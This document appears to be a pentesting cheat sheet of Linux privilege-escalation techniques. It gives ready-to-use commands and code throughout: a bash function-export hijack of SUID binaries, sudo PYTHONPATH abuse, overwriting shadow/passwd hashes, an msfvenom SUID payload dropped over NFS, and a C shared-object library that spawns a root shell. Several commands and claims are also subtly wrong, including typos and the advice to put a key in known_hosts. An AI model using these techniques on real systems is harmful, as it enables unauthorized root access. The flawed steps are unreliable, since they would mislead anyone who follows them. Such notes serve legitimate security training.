Linux
A list of Privilege Escalation Techniques for Linux.
Local Privesc Scanner
linPEAS
LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix/MacOS hosts.
Github: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
Know vulnerabilities
Sudo version <= 1.9.12p1
Allow a user that have sudo
privileges for sudoedit
to read/write all files of another user.
Polkit vulnerability
Kernel exploits
bash < 4.2-048:
How to exploit :
Find a suid binary, check with
strings
what linux binary it's usingCreate a function with the same name
function <path_to_used_binary> { /bin/bash -p; };
Export it
export -f /usr/sbin/service
Run the suid binary
Commands runnable with sudo sudo -l
sudo -l
If commands are runnable with
NOPASSWORD
then check (gtfobins)[https://gtfobins.github.io/]If commands are runnable with
SETENV
that means you can use this to set an environment variable likePYTHONPATH
like thissudo -u <user> PYTHONPATH=<your/python/path> <command>
. This will force the program to execute the scripts in the given path whith the rights of the sudo user. Don't forget you can always create files in/tmp
.abuse wilcard commands
Users' commands history
You might find passwords in the history.
Binaries with the suid bit set
Check if the binaries are exploitables for privesc on (gtfobins)[https://gtfobins.github.io/].
Cron jobs
Abuse wildcard commands
Abuse environment variables
Writable /etc/shadow
/etc/shadow
Generate a new hash with mkpasswd -m sha-512 <new_password>
and replace the one of an user or create a new user
Writable /etc/password
/etc/password
Generate a new password hash with openssl passwd newpasswordhere
and then replace the x
of a user or create a new one
Readable /etc/shadow
/etc/shadow
Read the password's hash of the users and try to crack them
Readable ssh keys (use it to connect as the user)
If the ssh key is password protected you can use ssh2jonh.py id_rsa > tojohn.txt
to convert it into a hash and the crack the password with john tojohntxt
Writable know_hosts
file: add your id_rsa.pub
key in it and then connect as the user
know_hosts
file: add your id_rsa.pub
key in it and then connect as the userSecrets in config files
Abuse NFS configuration:
Check: cat /etc/exports
How to exploit:
Mount the nfs on your machine
sudo mksir /tmp/nfs;sudo mount -o rw,vers=3 10.10.10.10:/tmp /tmp/nfs
Generate payload
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
Add suid bit and execution
chmod +xs /tmp/nfs/shell.elf
Execute the payload on the machine
/tmp/shell.elf
Hijack shared objects (resource):
Requirements: * a suid binary or a binary callable with sudo * a way to make the binary call a shared object you wrote: * shared object does not exist => create it * shared object is writable => overwrite it * binary is callable with sudo and keeps LD_LIBRARY_PATH
variable => export the env variable when calling the binary * /etc/ld.so.conf.d
contains a config file which points to somewhere you can write => put your exploit in the pointed path How to check exploitability: * Check loaded shared objects and if there is variables like RUNPATH: readelf -d ./binary
* Check if the binary finds the shared objects ldd binary
*
How to exploit: * write your exploit (you can replace the function name by a function used by the binary): c #include <stdio.h> #include <unistd.h> #include <sys/types.h> void _init(){ setreuid(geteuid(), geteuid()); system("/bin/bash -p"); }
* compile it: gcc -shared -fPIC -nostartfiles -o lib.so exploit.c
* put it somewhere where the binary will load it * run the binary
Last updated